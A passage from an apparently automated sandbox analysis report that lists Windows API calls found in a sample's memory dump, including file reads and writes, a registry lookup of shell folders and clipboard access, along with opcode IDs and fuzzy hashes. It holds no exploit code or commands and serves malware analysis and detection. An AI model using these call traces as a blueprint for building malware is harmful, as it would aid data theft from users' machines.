                                                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3934441357-0
                                                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                  • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                  APIs
                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: EnumNamesResource
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3334572018-0
                                                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                  APIs
                                                                                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFind
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1863332320-0
                                                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 71445658-0
                                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3655998216-0
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1828521557-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                    • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 609303285-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2136311172-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1936579350-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  APIs
                                                                                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                  • GetLastError.KERNEL32 ref: 00409974
                                                                                                                  • CloseClipboard.USER32 ref: 0040997D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3604893535-0
                                                                                                                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                  APIs
                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                  • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                  • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4218492932-0
                                                                                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                  APIs
                                                                                                                  • EmptyClipboard.USER32 ref: 00409882
                                                                                                                  • wcslen.MSVCRT ref: 0040988F
                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                  • CloseClipboard.USER32 ref: 004098D7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1213725291-0
                                                                                                                  • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                  • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7626DF80,?,0041755F,?), ref: 00417452
                                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1865533344-0
                                                                                                                  • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                  • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
